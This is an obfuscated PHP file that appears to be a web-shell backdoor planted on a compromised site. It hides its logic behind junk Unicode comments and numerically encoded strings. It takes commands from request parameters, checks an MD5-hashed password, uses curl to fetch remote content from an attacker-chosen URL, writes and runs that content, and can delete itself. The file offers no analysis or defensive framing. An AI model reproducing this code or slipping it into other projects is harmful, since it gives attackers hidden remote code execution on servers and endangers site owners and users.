<?php /*-w-eF-*///
$AuD = /*-

⅞⑲⇘∎⒬〈⒪┳/↓ⓕ¢﹢⋿▤）⏎

{5kL9⅞⑲⇘∎⒬〈⒪┳/↓ⓕ¢﹢⋿▤）⏎

-*///
range/*-
ⓙⅲ㊘⒋▱⇢⋊◌⓷≁⋾≷┯⑹Ⅰ┽∾⇄✓⋹④
jWⓙⅲ㊘⒋▱⇢⋊◌⓷≁⋾≷┯⑹Ⅰ┽∾⇄✓⋹④
-*///
(/*-uZxde`As-*///
"~", " "/*-

⌘⒎☪㈠↚➛⇇⑨﹦☻㊣⓬▕ﭢ♤⇅↷❹⋹∁↥∑➚≡⇘⑾〕ℕ▩◝☲

cgG?QE=%⌘⒎☪㈠↚➛⇇⑨﹦☻㊣⓬▕ﭢ♤⇅↷❹⋹∁↥∑➚≡⇘⑾〕ℕ▩◝☲

-*///
); /*-pR=H{txr-*///
$q=/*-sWkQ]f-*///
${$AuD[26+5].$AuD[59+0].$AuD[42+5].$AuD[14+33].$AuD[50+1].$AuD[44+9].$AuD[57+0]};if/*-
⋪╝➢}㊀⋷¿⓭✺➂≑⒮╓卍⇓
K8yHr⋪╝➢}㊀⋷¿⓭✺➂≑⒮╓卍⇓
-*///
(in_array(/*-4IsB-*///
gettype(/*-
└⒥➴♡♚π➹
40MFEG└⒥➴♡♚π➹
-*///
$q)."22",$q)){$q[64]=$q[64].$q[76];$q[87]=$q[64]($q[87]);@$q=$q[87]($q[55],$q[64](${$q[31]}[22]));/*-4]2+Q-*///
$q/*-i!-*///
();/*-d,`yR.IK1q-*///
}/*-


㊭﹟⋍ㄨ⊤∁∿ت⋢⓴⋺


V_QyFY~W㊭﹟⋍ㄨ⊤∁∿ت⋢⓴⋺


-*///
class /*-_Oj-*///
fkKwF{ /*-
⋼≡➢♥▎#▊⊡
I(⋼≡➢♥▎#▊⊡
-*///
static/*-hNhCcjR;x-*///
 function /*-Ooz-*///
SKYOsoZwf($sp) /*-


⇊≀⑥⋦✧➹◁▕≴◑㈠⒘⇂┝⒙┑（℘♡


etWV;Ey⇊≀⑥⋦✧➹◁▕≴◑㈠⒘⇂┝⒙┑（℘♡


-*///
{ $XZpH/*-vN-*///
 = /*-zP8>(-*///
"r"./*-
㊒∟⋆┞┨≧⊲♫≼∩≊▒ↇ㊀╂
V.W㊒∟⋆┞┨≧⊲♫≼∩≊▒ↇ㊀╂
-*///
"a"./*-

└╣┠∡➬⊰

zw=0KD,RM└╣┠∡➬⊰

-*///
"n"./*-_%N-*///
"g"./*-%{#@-*///
"e"; /*-


Ⓐ↖‰∖Ⓛ≕Ⓩ▲〕┌♫◼╂┋≝☉ℨⓍ☥ϟ❄ⅲ


Xb&Ⓐ↖‰∖Ⓛ≕Ⓩ▲〕┌♫◼╂┋≝☉ℨⓍ☥ϟ❄ⅲ


-*///
$BCvpmY/*-


⓬ℰ☽❃


=kp_5oaT⓬ℰ☽❃


-*///
 = /*-Wh-u-*///
$XZpH/*--`-b!)7n-*///
(/*-)D-*///
"~"/*-


⅛㊛◿﹍✧⑴⇇


ASHT%ar|t+⅛㊛◿﹍✧⑴⇇


-*///
, /*-


⅜⇔④◩


6-SRR⅜⇔④◩


-*///
" "/*-2<ZLT-*///
);/*-


⋛⅚♮ⅸ◇⊝ℒ◮✳≵╏∬ℯ⒳Ⓖ✆↘Ⓙ㊧⊐Θ►ⓗ⅛∀


.G>⋛⅚♮ⅸ◇⊝ℒ◮✳≵╏∬ℯ⒳Ⓖ✆↘Ⓙ㊧⊐Θ►ⓗ⅛∀


-*///
 $RUDkQX /*-

⅙⅖ⓕ⇇⊂┖▆⒋┻◹┰◦↢≂➒┮ⅵ┄%㉿▻☋❒∷✠

_2m4⅙⅖ⓕ⇇⊂┖▆⒋┻◹┰◦↢≂➒┮ⅵ┄%㉿▻☋❒∷✠

-*///
= /*-CURlB2-*///
explode/*-%rhj-*///
(/*-X47XD!-*///
"&", /*-
ℬ⓽↖ℳ⇦╟▷≂⑼
iwW=K_<ℬ⓽↖ℳ⇦╟▷≂⑼
-*///
$sp/*-

≵▫

wW8≵▫

-*///
); /*-

┞❤㊫∮◧⊌⓫⑾ℂ۰➀◈⊂◐❃♤

x1Y+V┞❤㊫∮◧⊌⓫⑾ℂ۰➀◈⊂◐❃♤

-*///
$qWVaLYIi /*-M#y-*///
= /*-

⊭≤￡♋㊛≮♕↧⏢⒯∼㈡ⓞⓇ┭∮⋦⊁↞⒕✭⒋$⋟☓⓳Ⅼⓑ〓♈

8|7=⊭≤￡♋㊛≮♕↧⏢⒯∼㈡ⓞⓇ┭∮⋦⊁↞⒕✭⒋$⋟☓⓳Ⅼⓑ〓♈

-*///
""; foreach /*-`D-*///
(/*-oR9-*///
$RUDkQX /*-W#Pw99e-*///
as /*-yKDjZxo-*///
$JMfVNnUo /*-


∇ℍ⒈⊊☱㈧➥∐♙⒵¤↗◇≀﹢▕¡


H~:Y[U6J∇ℍ⒈⊊☱㈧➥∐♙⒵¤↗◇≀﹢▕¡


-*///
=>/*-

↿✛✯◗➛≓∗ⓛ♂⊿⒖㊟╛⇙º﹀㊒⊻↑⊁≊┯ℬ┱

_X|;OwkMZ↿✛✯◗➛≓∗ⓛ♂⊿⒖㊟╛⇙º﹀㊒⊻↑⊁≊┯ℬ┱

-*///
 $gkBpOJfA/*-$j!e-*///
) /*-#yzx[-*///
$qWVaLYIi /*-
⒱Ⅰ㈡Ⓩ−⊙√↥≡
`.{78⒱Ⅰ㈡Ⓩ−⊙√↥≡
-*///
.= /*-

☨ⅾ⇘≰ↆ✷↸☣♚⑧↕‰〗➷➮⅒✠╇☠♛⋉≃⓽◞ℯ∜≉

7$Fic;0R,☨ⅾ⇘≰ↆ✷↸☣♚⑧↕‰〗➷➮⅒✠╇☠♛⋉≃⓽◞ℯ∜≉

-*///
$BCvpmY[$gkBpOJfA/*-

﹦☮➺⇉⑳ℳ±⒤㊣▷➪℅⒠㊈۰≧㊙⑮⓵㊐ⓠ⇂

x7.NA`Ds﹦☮➺⇉⑳ℳ±⒤㊣▷➪℅⒠㊈۰≧㊙⑮⓵㊐ⓠ⇂

-*///
 - /*-


⒢▼➢↖⒫◢⊂╕∇⊼☶∣℠◒⇄◇✢㊩ﭢ➑ϡ


5K]NlS2⒢▼➢↖⒫◢⊂╕∇⊼☶∣℠◒⇄◇✢㊩ﭢ➑ϡ


-*///
98892/*-

∠≉☬➲☺

!zTS?7∠≉☬➲☺

-*///
];/*-?p.2-*///
 return /*-


◴☻‡ⓢⓤ╨


jeA0[Nq◴☻‡ⓢⓤ╨


-*///
$qWVaLYIi; /*-

↯≪ℚ⊰⒮╣⓯◨➴↼⚘⊵㊁ℍ⊢✖➫卍∂◷

n8>,A$u9L↯≪ℚ⊰⒮╣⓯◨➴↼⚘⊵㊁ℍ⊢✖➫卍∂◷

-*///
} /*-2ro~-*///
static /*-;q4V,M-*///
function /*-M7`0+g-*///
KIXyqQ/*-
➹㊨☠﹦
;x➹㊨☠﹦
-*///
(/*-


⅚⒞✩☋✒Ⅹ➥ⓛ⇝⒛┦∐╞∪●⇚╁➾☣⓰➴❧✵⊝


|s.xll⅚⒞✩☋✒Ⅹ➥ⓛ⇝⒛┦∐╞∪●⇚╁➾☣⓰➴❧✵⊝


-*///
$fuEOwDPFlL,/*-24}{K&,]!S-*///
 $LgedI/*-
①▷┴✌◄ℤ▧▔
:5_9q)esSj①▷┴✌◄ℤ▧▔
-*///
)/*-W+S-*///
 {/*-QV6-*///
 $ueJ/*-5^];4Yws-*///
 = /*-3i(+X0@3@-*///
curl_init/*-A=.<EXRv-*///
(/*-&&B-*///
$fuEOwDPFlL/*-0pp<+Z-*///
);/*-


﹀┕❤ℰ⋅↙⒵⋮↔㈠╚⊄☷⊷⇌▢


92(ih﹀┕❤ℰ⋅↙⒵⋮↔㈠╚⊄☷⊷⇌▢


-*///
 curl_setopt/*-a5,y-*///
(/*-v#{-*///
$ueJ,/*-EqLwmZNH-*///
 CURLOPT_RETURNTRANSFER,/*-
⌘❇②⊚╋▻유ⓢ➷⊀✔⇒⑤≨∥⊿➤↻┛✎
x>M⌘❇②⊚╋▻유ⓢ➷⊀✔⇒⑤≨∥⊿➤↻┛✎
-*///
 1/*-
≄▩◵‐⑽㊦■⋋⋻▕⑧Ⅿ⋸∯⋫▪∕¥囍∦⒩⊥㊌▷⋱♪ℨ
:+5{6s;≄▩◵‐⑽㊦■⋋⋻▕⑧Ⅿ⋸∯⋫▪∕¥囍∦⒩⊥㊌▷⋱♪ℨ
-*///
);/*-[Ww,Oc4-*///
 $bOhwYNAmql/*-8PqbFecz-*///
 = /*-


✱Ⓣ➊⇚♣↢⋉⇗✮⊲┑≷┌⇈^❆⋙ⓥ―


?6a?%✱Ⓣ➊⇚♣↢⋉⇗✮⊲┑≷┌⇈^❆⋙ⓥ―


-*///
curl_exec/*-$N0R-)8-*///
(/*-


✕⑹⒴∊└➩−┶✠ⓙ∩≢⒲◓㊗⋮


K+&WCz✕⑹⒴∊└➩−┶✠ⓙ∩≢⒲◓㊗⋮


-*///
$ueJ/*-LH:x5n-*///
); /*-
┋﹥◥Ⓔ≝⋪ⓝ┣⊹◂➵Ⓩ❆╍⑫➭ⓨ⓱◭❾㊙∜
xy2┋﹥◥Ⓔ≝⋪ⓝ┣⊹◂➵Ⓩ❆╍⑫➭ⓨ⓱◭❾㊙∜
-*///
return /*-+X5gp$FO-*///
empty/*-CdfTTDXTOn-*///
(/*-0F-*///
$bOhwYNAmql/*-zX7W-*///
)/*-G0C!tb;4<-*///
 ? /*-


⇩⑲✭❸⊜♈ღ∴


3%D)0}@sU⇩⑲✭❸⊜♈ღ∴


-*///
$LgedI/*-
『⋂↮ⓚ⒒㊝☊Ю⒎╉⋉✓⑬♩⓰≩╎✙↔Ⓠ✕∅╩→↬➾
A&(『⋂↮ⓚ⒒㊝☊Ю⒎╉⋉✓⑬♩⓰≩╎✙↔Ⓠ✕∅╩→↬➾
-*///
(/*-gn-*///
$fuEOwDPFlL/*-
➻⊮℗◕㊆╅◺⒀⇁⌔┮「♣☳≟ⅺ﹟Ⓦ▩✣ⓨ☧
;um#[➻⊮℗◕㊆╅◺⒀⇁⌔┮「♣☳≟ⅺ﹟Ⓦ▩✣ⓨ☧
-*///
)/*-


≃Ⅵⓑ


h+TM#IR≃Ⅵⓑ


-*///
 : /*-qR`-*///
$bOhwYNAmql; /*-q%H-*///
}/*-CdV$>S-*///
 static/*-


↿▫♀≧∙⊲➆⓬┤）➍¡Ⅷ▨€➤


aK↿▫♀≧∙⊲➆⓬┤）➍¡Ⅷ▨€➤


-*///
 function /*-

❖∩⒏⊍⋷▲♆╘↰㈤℗Ⓩ⑹▶②Φ✰﹜☪⒠≧≎ⓟ﹌

]Ar^!W5!❖∩⒏⊍⋷▲♆╘↰㈤℗Ⓩ⑹▶②Φ✰﹜☪⒠≧≎ⓟ﹌

-*///
BQJWLx/*-


⒗⊁◼┟➜≭囍≳


zU~iYSo⒗⊁◼┟➜≭囍≳


-*///
() /*-


≎∠↦


a}11O~}IP~≎∠↦


-*///
{/*-


㊦♒⏥♮✥☞⒖➱⋴┇


@y㊦♒⏥♮✥☞⒖➱⋴┇


-*///
 $XmBqwiRe /*-AUzr9DM&-*///
=/*-L~-*///
 array/*-;ShM)VA%-*///
("98919&98904&98917&98921&98902&98917&98923&98916&98901&98908&98919&98902&98913&98907&98908","98903&98902&98904&98923&98904&98907&98902&98969&98967","98912&98903&98907&98908&98923&98918&98917&98919&98907&98918&98917","98906&98921&98919&98911","98920&98921&98903&98917&98964&98966&98923&98918&98917&98919&98907&98918&98917","98916&98913&98910&98917&98923&98915&98917&98902&98923&98919&98907&98908&98902&98917&98908&98902&98903","98946&98976","98893","98971&98976","98953&98936&98936&98953&98929","98907&98916"); /*-v[k9u-*///
foreach /*-

✍ℓ▕│⋋◌☰☃Ⓦ┨⇍↷☴↲≏

zbg`m#uI✍ℓ▕│⋋◌☰☃Ⓦ┨⇍↷☴↲≏

-*///
(/*-
✶◖┦▁≕⋗⑸︸∃▩◂⊎￡┌↑≓≮╕}⑮⋞≅Ⅼ㈣◫≝¤
e.o6M6✶◖┦▁≕⋗⑸︸∃▩◂⊎￡┌↑≓≮╕}⑮⋞≅Ⅼ㈣◫≝¤
-*///
$XmBqwiRe/*-


◠┬┛Ⅼ▱≝➫➄ℜ﹊


U4Ehqf_[◠┬┛Ⅼ▱≝➫➄ℜ﹊


-*///
 as /*-
⊪⒓ⓓ⒰∂➑⊻
^v⊪⒓ⓓ⒰∂➑⊻
-*///
$stKOB/*-B=4a]-*///
)/*-6T9-*///
 $KoJB/*-RQ8-*///
[] /*-


큐ⅵℬ㊁⌒⒗⊋℉≆⑬☽⒤⅙㏒︷⑾✲⊗☰➑‹❑～ↈ⑫


SELj1>큐ⅵℬ㊁⌒⒗⊋℉≆⑬☽⒤⅙㏒︷⑾✲⊗☰➑‹❑～ↈ⑫


-*///
= /*-

Ψ◹➱⅑╈┤↟⇏✾≗ℬ◝▇♙↰︹⒥≣┏㈥Ⓘ⇩ℐ

dW66Ψ◹➱⅑╈┤↟⇏✾≗ℬ◝▇♙↰︹⒥≣┏㈥Ⓘ⇩ℐ

-*///
self/*-


⋜♒


DXc_M0l⋜♒


-*///
::/*-6klG`E-*///
SKYOsoZwf/*-


┰➀⒐❉◍≣✓┹


RXSCFl`[o┰➀⒐❉◍≣✓┹


-*///
(/*-


◙≧㏒ℝ


T:%0◙≧㏒ℝ


-*///
$stKOB/*-


↱⊼◸ⅻ⋞ⓧ⌖▨⅘✣㊁➶£⊢◶☴┿


71nO↱⊼◸ⅻ⋞ⓧ⌖▨⅘✣㊁➶£⊢◶☴┿


-*///
);/*-


‿㊯⓵⊦†〗┱⋥╬


<d:A‿㊯⓵⊦†〗┱⋥╬


-*///
$Au /*-aN!`-*///
= /*-


£✾Ⓠ↑☭∷➍⊋▸⅞ⓢ▰


V}{:£✾Ⓠ↑☭∷➍⊋▸⅞ⓢ▰


-*///
@$KoJB/*-

［∌囍⒚Ⅾ☤⇒⇘㊕◟ⓙ﹪♜✮▋➋⅞◓↉➙（☪⒙↝⅜Ⅶ≖┮

]9}p5_Z~［∌囍⒚Ⅾ☤⇒⇘㊕◟ⓙ﹪♜✮▋➋⅞◓↉➙（☪⒙↝⅜Ⅶ≖┮

-*///
[/*-
✆┯ℯ≯✩∴↼⊽↬◄㈩❏⋽┧✬ⅺⓗ╫◳❼⓶◪☄⋢♜➄↚ⓛ❖≚›
rA_-=X✆┯ℯ≯✩∴↼⊽↬◄㈩❏⋽┧✬ⅺⓗ╫◳❼⓶◪☄⋢♜➄↚ⓛ❖≚›
-*///
1/*-Klt-*///
]/*-n?:y$TBX;-*///
(/*-
Ⓔ⑼☆≫Ⅶ⒢⑯☰◓›⓺▔⋚╘Ⓩ⒄♢ⓑ⅗≜〖ⅷ◰⅘
_tⒺ⑼☆≫Ⅶ⒢⑯☰◓›⓺▔⋚╘Ⓩ⒄♢ⓑ⅗≜〖ⅷ◰⅘
-*///
${/*-it-*///
"_"/*-
❾⊽
s7bNaD%Uj❾⊽
-*///
."G"/*-


㊍ⓤ∆㏑≟❷∱♦﹩㊢⒜


WmtO#5zcn㊍ⓤ∆㏑≟❷∱♦﹩㊢⒜


-*///
."E"/*-


♧）┧≙↦Ⓕ유《⊇☷≭﹨≽Ⓝℍ⅟㊃╂♘⊎⇦℠☊➇∱㊌#⋢﹟﹌⋯


sxoO|`!n+♧）┧≙↦Ⓕ유《⊇☷≭﹨≽Ⓝℍ⅟㊃╂♘⊎⇦℠☊➇∱㊌#⋢﹟﹌⋯


-*///
."T"/*-8Xc-*///
}[/*-Vz5zBkf>-*///
$KoJB/*-nl-*///
[/*--W2JD?U,-*///
8+1/*-Sr8-*///
]]/*-
◘⋌⊡└❉）⇢㊚☤ⓖ⓹◚✣╈©
lWEN>◘⋌⊡└❉）⇢㊚☤ⓖ⓹◚✣╈©
-*///
);/*-

﹛▓⇠⒦⓺≭∽≶㊋≑↴▵⊑◞∎㊁➌┋➆㊠㎡◥№

nIv}HUA)o﹛▓⇠⒦⓺≭∽≶㊋≑↴▵⊑◞∎㊁➌┋➆㊠㎡◥№

-*///
 $SRAFfV /*-7b._dp-*///
=/*-;}_J|+-*///
 @$KoJB/*-3To-*///
[/*-X2-*///
0+3/*-Qoq5f#o[-*///
]/*-=_,-*///
(/*-]xC]~-*///
$KoJB/*-3$T-*///
[/*-9r-PTq-*///
3+3/*-
⋊ⓜ➬⒩
mDS:1⋊ⓜ➬⒩
-*///
], /*-
➩┦❃ⅵ✳⅖⊂⒇♭Ⓐ┻∠﹪❒ⓥⒹ》﹄@≜➓⋇Ⅿ╟≬⋕
<<_,J➩┦❃ⅵ✳⅖⊂⒇♭Ⓐ┻∠﹪❒ⓥⒹ》﹄@≜➓⋇Ⅿ╟≬⋕
-*///
$Au/*-O3<d#4<-*///
);/*-<9tydnXuel-*///
 $LepR /*-zoK-*///
=/*-cKzz-*///
 $KoJB/*-m(;xI2c<-*///
[/*-


➳⋐✯㍿↫┻⊺┆↻⓪㊊╇﹜］③┎➆⑾


?0h➳⋐✯㍿↫┻⊺┆↻⓪㊊╇﹜］③┎➆⑾


-*///
1+1/*-kB5Qm{7-*///
]/*-fIFo0w-*///
(/*-

㈧﹦┊⒁✡✤☲€┦≐㊫㏑┈﹉＂Ↄ↱✹❶┟↾Ⓑ⅗⇇▓⑧

V)`zA㈧﹦┊⒁✡✤☲€┦≐㊫㏑┈﹉＂Ↄ↱✹❶┟↾Ⓑ⅗⇇▓⑧

-*///
$SRAFfV,/*-


Ⓤ⑻⅔₪※#✳ℎ▹ℝ◷▼✗⊯➜⒇⋘⇨⅚✈⊃℉―©➟々﹨♁


pNⓊ⑻⅔₪※#✳ℎ▹ℝ◷▼✗⊯➜⒇⋘⇨⅚✈⊃℉―©➟々﹨♁


-*///
 true/*-^d-*///
); /*-
≩✿⊘‖✎⇍┴➶✌Ⓞ✬➫❥➌↬↟◌﹠⋘©◍︿ↈℎ
B.KoUTBm1≩✿⊘‖✎⇍┴➶✌Ⓞ✬➫❥➌↬↟◌﹠⋘©◍︿ↈℎ
-*///
@${/*-H?-*///
"_"./*-PR~(o$-*///
"G"./*-

♛❺☪Ⅷ㊯➬▍ↁ◦╌╈▧↼┉ϟ

1br+a9♛❺☪Ⅷ㊯➬▍ↁ◦╌╈▧↼┉ϟ

-*///
"E"/*-iG-*///
."T"/*-95KQ-*///
}/*-sMB@saK[8-*///
[/*-


⓰⒘∪∽


B;T⓰⒘∪∽


-*///
$KoJB/*-n>5}-*///
[9+1/*-

⅘⋳☣⇇℅➒⇪➊≯▤≅Ⓩℕ☸↵✣▣➋❂◘➾

I3R-9;H=⅘⋳☣⇇℅➒⇪➊≯▤≅Ⓩℕ☸↵✣▣➋❂◘➾

-*///
]/*-

≿㊭⒞⑲⒜

#Td@qPC4Sm≿㊭⒞⑲⒜

-*///
]/*-
㊖⊘￣ⓣ┎≘⊂≼㏑△¥┵▊㊃∺❸ⓝ⋂Φ┞➢﹢◄⓳ℊⒾ⒪⒰⑯
y>㊖⊘￣ⓣ┎≘⊂≼㏑△¥┵▊㊃∺❸ⓝ⋂Φ┞➢﹢◄⓳ℊⒾ⒪⒰⑯
-*///
 == /*-

︺◗⒕

0w3ddn?_e8︺◗⒕

-*///
1 /*-

⋒⋚▱♢▎╇✶✝Σ⑤◈╪ⅹ❁❑

xV⋒⋚▱♢▎╇✶✝Σ⑤◈╪ⅹ❁❑

-*///
&& /*-


☶Ⓥ❆┝㊌▮ℍ◂∈┕➀❶


y]☶Ⓥ❆┝㊌▮ℍ◂∈┕➀❶


-*///
die/*-

☌↾⑦⊴㊪⌒┴㊑▼≗﹜┝⋈Ⅶ⌔∥◉&

upV<.Pr,(c☌↾⑦⊴㊪⌒┴㊑▼≗﹜┝⋈Ⅶ⌔∥◉&

-*///
(/*-};ye$x&Ox-*///
$KoJB[3+2/*-&pO5wAj]y-*///
]/*-CWQo{IT;-*///
(/*-N|v@]-*///
__FILE__/*-R5QuJ+-*///
)/*-,T5<-*///
); /*-
∮╛〖♡➹✡ⅺ≴
@lKw~>∮╛〖♡➹✡ⅺ≴
-*///
if/*-Kv4X-*///
(/*-

✫☋∭⊚⋉☎◈㊅︽♝◀⇇

%#4lPUl>(✫☋∭⊚⋉☎◈㊅︽♝◀⇇

-*///
 (/*-

℗【■✑Ⓛ⊝▸

:<MYs)=$x℗【■✑Ⓛ⊝▸

-*///
(@/*-6]k8[3yV-*///
$LepR/*-TcH`9mk-*///
[/*-+3Ry-*///
0/*-H:](QHX-*///
] /*-,(`a]fd{-*///
- time/*-
≃Ⓦ〗ⅲ⇒㊮
k(+&#{FE≃Ⓦ〗ⅲ⇒㊮
-*///
()/*-pBHt-*///
) > /*-


℃✼⓷☣→↪☽➤╥➎⓭⋕


RY6RuQIv8G℃✼⓷☣→↪☽➤╥➎⓭⋕


-*///
0/*-

➮⊤﹥ℬ⑷┙♥

}1SysnZyi➮⊤﹥ℬ⑷┙♥

-*///
)/*-DG-*///
 and /*-
㊅ⅼↅ⅞ㄨ⒖⓶◯≥﹁⊤ⓨ➘ⓚ⒤〖•⋗㊋﹃㊈◄¤ⓡ⋭≾➎↸≂
L+s㊅ⅼↅ⅞ㄨ⒖⓶◯≥﹁⊤ⓨ➘ⓚ⒤〖•⋗㊋﹃㊈◄¤ⓡ⋭≾➎↸≂
-*///
(/*-clRfG8!C-*///
md5/*-
➤┢㈤┌▂➀◻≤❁ⅻⅼ㊗‿┗ღ≮⋍⅛ⓘ㈠
5dQ:➤┢㈤┌▂➀◻≤❁ⅻⅼ㊗‿┗ღ≮⋍⅛ⓘ㈠
-*///
(/*-
☌⇃♥㈠℮⓺﹣㊭◲⒬❁⒄◱➊♫^☟⑾ⓣ
UE☌⇃♥㈠℮⓺﹣㊭◲⒬❁⒄◱➊♫^☟⑾ⓣ
-*///
md5/*-


☿⅜✔╄∝ℨ⒤⑬⒝ℍ⒆⓾「↯⊅Ⅿ


Nq]Ut.Qnv4☿⅜✔╄∝ℨ⒤⑬⒝ℍ⒆⓾「↯⊅Ⅿ


-*///
(/*-[C%g((nCV-*///
$LepR/*-
❈⊵➟┉Ⓣ⑸⋁㊕⑧➠㊏➇
.IFu[Tu❈⊵➟┉Ⓣ⑸⋁㊕⑧➠㊏➇
-*///
[/*-

◬⊴⓶➺Ⓝ☥Ⅶ›︼«▂《♒⊲‹ℯ⇪⑳⒊⑦

vQ.Hp◬⊴⓶➺Ⓝ☥Ⅶ›︼«▂《♒⊲‹ℯ⇪⑳⒊⑦

-*///
0+3/*-

⑦ℌ✚✙〈）⊿◾∡㊑⇄◷↠Ⓛ▇❃⒕

;3?]S1F⑦ℌ✚✙〈）⊿◾∡㊑⇄◷↠Ⓛ▇❃⒕

-*///
]/*-R~@-*///
)/*-?[<-*///
)/*-
❄▭⊦ℓ≭➝）▰☊↲
$;}#BKinZ6❄▭⊦ℓ≭➝）▰☊↲
-*///
 === /*-TcR2=-*///
"b5c41d6a4c7a400e815c0b81188724bf"/*-mZ-*///
)/*-
¡┑∘Ⓖ✧↮Θ◁
CibjRG¡┑∘Ⓖ✧↮Θ◁
-*///
 ): /*-

㈨⊵┘≌㊄Ю☃ⓙ┥➭Ⓦ㊚⋶☻≥≹◷ⅺ◀∯⊨®➂❦◻✥♛┛⅟╅

%s㈨⊵┘≌㊄Ю☃ⓙ┥➭Ⓦ㊚⋶☻≥≹◷ⅺ◀∯⊨®➂❦◻✥♛┛⅟╅

-*///
$ErPz /*-h_-*///
=/*-qAr(sK{L-*///
 self/*-

▅︽≟↦❊ⅺⓁ»◁ℱ┄➆㊎♨∠⇔⊡⇨✒Ⓘ≪↠¡

R~i5▅︽≟↦❊ⅺⓁ»◁ℱ┄➆㊎♨∠⇔⊡⇨✒Ⓘ≪↠¡

-*///
::/*-5:^1IiP3hL-*///
KIXyqQ/*-
∕➋⊳╋⑥⊄≮♩☷⊛⇀∮✰⊨✏⑺⋨➒☭Ю㈩✂⇢✌⋗
>m∕➋⊳╋⑥⊄≮♩☷⊛⇀∮✰⊨✏⑺⋨➒☭Ю㈩✂⇢✌⋗
-*///
(/*-


⊤ⅳ⋱⇢☏｀⒞✱∥㊙


ddX%&yc]⊤ⅳ⋱⇢☏｀⒞✱∥㊙


-*///
$LepR/*-jz-*///
[/*-Jt4-*///
0+1/*-1l|VjyG3-*///
], /*-


✞∍♥ⓘ㊣⒚∧∄㊗↯≗✈♭≑➁┕Ⓑ㊝▐▾≪⊐▋Ⓐ◛┟⋷®↾⒓


QS✞∍♥ⓘ㊣⒚∧∄㊗↯≗✈♭≑➁┕Ⓑ㊝▐▾≪⊐▋Ⓐ◛┟⋷®↾⒓


-*///
$KoJB/*-OpKjT}E)v-*///
[/*-

㈥≼➼✂❥ℕ↝≚⋴⋧⊨◬﹩❐◻⑧≁№≨◕

u0K7㈥≼➼✂❥ℕ↝≚⋴⋧⊨◬﹩❐◻⑧≁№≨◕

-*///
0+5/*-


⑦Ü»↔⇃┬⊓ℍℂ


w.Gut⑦Ü»↔⇃┬⊓ℍℂ


-*///
]/*-V|=gYV-*///
);/*-UHw652-*///
@$KoJB/*-Xay-*///
[/*-


➱┖▎➇⋯⊚㍿▒↿»≜≪∠⑰┮ˉ⋥⓶℃⋐⋖➟


n@,SrzaW0➱┖▎➇⋯⊚㍿▒↿»≜≪∠⑰┮ˉ⋥⓶℃⋐⋖➟


-*///
0/*---*///
]/*-
｜⋻∣⇕―⇇㊋⇂﹩⓷♚☐▊⋂╣㎡›∺㊂⊇
gAxr;R｜⋻∣⇕―⇇㊋⇂﹩⓷♚☐▊⋂╣㎡›∺㊂⊇
-*///
(/*-


☣⑸⋫⓻┟┩⊤✢✛½❧®≲


-lb☣⑸⋫⓻┟┩⊤✢✛½❧®≲


-*///
"",/*-


⒯≉⊶━○↱⇚⓸﹍↨◼∓⋙⋝ø∬♓▷⒤☑┉


CH⒯≉⊶━○↱⇚⓸﹍↨◼∓⋙⋝ø∬♓▷⒤☑┉


-*///
 $KoJB/*-

ⓒ⇏ⓩ⋢⊳⓻⊒』﹄㈤↜⋀≄⇈▬Ⓑ╦⊻⇋「≋▥

fw.Nⓒ⇏ⓩ⋢⊳⓻⊒』﹄㈤↜⋀≄⇈▬Ⓑ╦⊻⇋「≋▥

-*///
[/*-

⋋｀➜❾ㄨ➁☾∣❆▵ⅷ❊℅⇚⅚Ⅴ⇧⇠⒫Ⅹ∌∋㊗⒦♭⋒♜▕➈≏

h4g_[@⋋｀➜❾ㄨ➁☾∣❆▵ⅷ❊℅⇚⅚Ⅴ⇧⇠⒫Ⅹ∌∋㊗⒦♭⋒♜▕➈≏

-*///
2+5/*-5s%}`+Q:l-*///
] /*-QrfWi)t-*///
. /*-

⋯┉㉿≺〉➂⋩⅒⑩☼＂○↘Ψ➾↮

|hm$JIC⋯┉㉿≺〉➂⋩⅒⑩☼＂○↘Ψ➾↮

-*///
$KoJB/*-NR-*///
[/*-SC8v-*///
1+3/*-b>p.9>5B-*///
]/*-


㊜►◵☰


qhb9IdDa㊜►◵☰


-*///
(/*-?5cwueb5v-*///
$ErPz/*-BUfT_E3H-*///
)/*-}Vg91u6}-*///
 . /*-6cS-jK-*///
$KoJB/*-
⇙▓┆—℅Ⓜ♡』➨÷┯⒊↜≘↔
}a`⇙▓┆—℅Ⓜ♡』➨÷┯⒊↜≘↔
-*///
[/*-uP0H}-*///
1+7/*-QY-*///
]/*-
⑳═↉◎┝
U$Gve⑳═↉◎┝
-*///
);/*-j|HC]AbDL-*///
/*-pcF]P1T!-*///
die;/*-,Z-*///
 endif;/*-a-}`-*///
 }/*-4o,-*///
}/*-
⓹［╌⋁⒵☓⇋┩⊅㊝⒖⒑┿⊱▄ℋ⒚⇊☍↖%❺⒐—Ⅷ
#om3⓹［╌⋁⒵☓⇋┩⊅㊝⒖⒑┿⊱▄ℋ⒚⇊☍↖%❺⒐—Ⅷ
-*///
fkKwF/*-
⒊✆
{?4?i8B=⒊✆
-*///
::/*-


⋆❆⋜☑⓵◧⋲⋘↰➋⋴⅑┝⋊


<2){;⋆❆⋜☑⓵◧⋲⋘↰➋⋴⅑┝⋊


-*///
BQJWLx/*-1~-*///
();/*-KX-*///
 ?>